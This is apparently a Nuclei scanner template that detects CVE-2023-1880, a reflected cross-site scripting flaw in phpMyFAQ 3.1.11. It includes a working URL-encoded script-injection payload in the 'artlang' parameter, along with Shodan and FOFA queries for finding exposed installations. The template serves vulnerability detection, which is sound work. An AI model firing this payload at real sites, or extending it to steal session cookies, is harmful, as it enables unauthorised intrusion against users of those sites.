Description
Phpmyfaq v3.1.11 is vulnerable to reflected XSS in send2friend because the 'artlang' parameter is not sanitized.
Phpmyfaq v3.1.11 is vulnerable to reflected XSS in send2friend because the 'artlang' parameter is not sanitized.
id: CVE-2023-1880
info:
name: Phpmyfaq v3.1.11 - Cross-Site Scripting
author: r3Y3r53
severity: medium
description: |
Phpmyfaq v3.1.11 is vulnerable to reflected XSS in send2friend because the 'artlang' parameter is not sanitized.
impact: |
Unauthenticated attackers can inject malicious JavaScript through the unsanitized artlang parameter in send2friend functionality to steal user session cookies.
remediation: Fixed in 3.1.12 Version.
reference:
- https://huntr.dev/bounties/ece5f051-674e-4919-b998-594714910f9e
- https://nvd.nist.gov/vuln/detail/CVE-2023-1880
- https://github.com/thorsten/phpmyfaq/commit/bbc5d4aa4a4375c14e34dd9fcad2042066fe476d
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-1880
cwe-id: CWE-79
epss-score: 0.01644
epss-percentile: 0.75229
cpe: cpe:2.3:a:phpmyfaq:phpmyfaq:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: phpmyfaq
product: phpmyfaq
shodan-query: http.html:"phpmyfaq"
fofa-query: body="phpmyfaq"
tags: cve2023,cve,huntr,xss,phpmyfaq,vuln
http:
- method: GET
path:
- "{{BaseURL}}/?action=send2friend&artlang=aaaa%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "phpmyfaq") && contains(body, "<script>alert(document.domain)</script>")'
- 'contains(content_type, "text/html")'
condition: and
# digest: 4a0a00473045022100844d87cf5ca67112845368a9a062cf345cb82e6c9593b15cd3ef514a594dfacd02201de224e90b4503ca7cffdeb4b99a46543fdac0dfd2d32ecadc106366de3bced3:922c64590222798bb761d5b6d8e72950
# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.